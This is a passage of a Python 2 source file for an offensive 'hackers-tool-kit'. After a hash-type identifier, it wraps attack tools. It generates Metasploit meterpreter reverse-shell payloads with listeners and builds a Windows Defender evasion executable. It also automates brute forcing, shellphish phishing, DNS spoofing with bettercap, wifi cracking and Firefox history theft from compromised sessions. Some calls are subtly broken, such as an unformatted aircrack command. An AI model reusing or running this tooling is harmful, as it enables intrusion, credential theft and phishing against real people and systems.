hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#DNS SPOOF START# -#---------------# -def dnsspoof(): - target = raw_input("\033[1mTarget:\033[0m ") - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dns.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) - os.system('echo "dns.spoof on\n" >> dns.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dns.cap") - os.system("rm dns.cap") - -def dnsspoofall(): - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dnsall.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') - os.system('echo "dns.spoof on\n" >> dnsall.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dnsall.cap") - os.system("rm dnsall.cap") - - -#-------------# -#DNS SPOOF END# - - -#REBOOT HTK START# -#----------# -def reboot(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() -#--------------# -#REBOOT HTK END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - try: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit": - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - 